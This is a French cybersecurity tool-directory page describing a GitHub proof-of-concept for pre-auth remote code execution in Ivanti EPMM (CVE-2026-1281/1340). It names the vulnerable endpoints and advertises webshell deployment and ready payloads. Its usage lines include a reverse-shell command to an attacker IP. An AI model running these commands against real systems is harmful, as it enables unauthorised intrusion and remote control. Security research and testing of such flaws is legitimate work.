Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/mehdiledeaut/cve-2026-1281-ivanti-epmm-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubmehdiledeaut/cve-2026-1281-ivanti-epmm-rce

CVE-2026-1281-Ivanti-EPMM-RCE

Proof of Concept for CVE-2026-1281 & CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE via Bash Arithmetic Expansion

Voir le dépôt
61il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-1281 & CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE

License Python CVSS

⚠️ DISCLAIMER: Ce PoC est fourni uniquement à des fins éducatives et de recherche en sécurité. L'utilisation sans autorisation explicite est illégale.

🎯 Description

Proof of Concept (PoC) complet pour l'exploitation des vulnérabilités CVE-2026-1281 et CVE-2026-1340 affectant Ivanti Endpoint Manager Mobile (EPMM). Ces vulnérabilités permettent une exécution de code arbitraire à distance (RCE) sans authentification via un mécanisme de Bash Arithmetic Expansion.

Vulnérabilités

  • CVE-2026-1281 : Code injection dans l'endpoint /mifs/c/appstore/fob/
  • CVE-2026-1340 : Code injection dans l'endpoint
/mifs/c/aftstore/fob/
  • Score CVSS : 9.8 (Critical)
  • Exploitation : Active in-the-wild (Zero-Day)
  • 🚀 Fonctionnalités

    • ✅ Framework de validation automatisé (8 tests)
    • ✅ Exploitation Pre-Auth RCE
    • ✅ Reverse shell automatique
    • ✅ Déploiement de webshell
    • ✅ 50+ payloads prêts à l'emploi
    • ✅ Scripts de détection pour Blue Team
    • ✅ Documentation complète

    📦 Installation

    root@kitploit:~
    git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
    cd CVE-2026-1281-Ivanti-EPMM-RCE
    pip3 install -r requirements.txt
    chmod +x *.py
    

    🎯 Utilisation Rapide

    root@kitploit:~
    # Test de vulnérabilité
    python3 exploit.py -t https://target.com -c
    
    # Validation RCE
    python3 exploit.py -t https://target.com --test-rce
    
    # Reverse shell
    python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
    

    📚 Documentation

    • README complet - Documentation technique détaillée
    • Guide d'utilisation - Guide étape par étape
    • Payloads - Collection de 50+ payloads
    • Guide Red Team - Scénarios opérationnels

    🔗 Références

    • CERT-FR CERTFR-2026-ALE-001
    • Watchtowr Labs Analysis
    • CVE-2026-1281
    • CVE-2026-1340

    👤 Auteur

    Mehdi Le Deaut - Cybersecurity Consultant | Red Team Specialist

    LinkedIn

    ⚖️ Licence

    Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

    🙏 Remerciements

    • CERT-FR pour l'alerte rapide
    • Watchtowr Labs pour l'analyse technique
    • La communauté cybersécurité
    Télécharger l’outil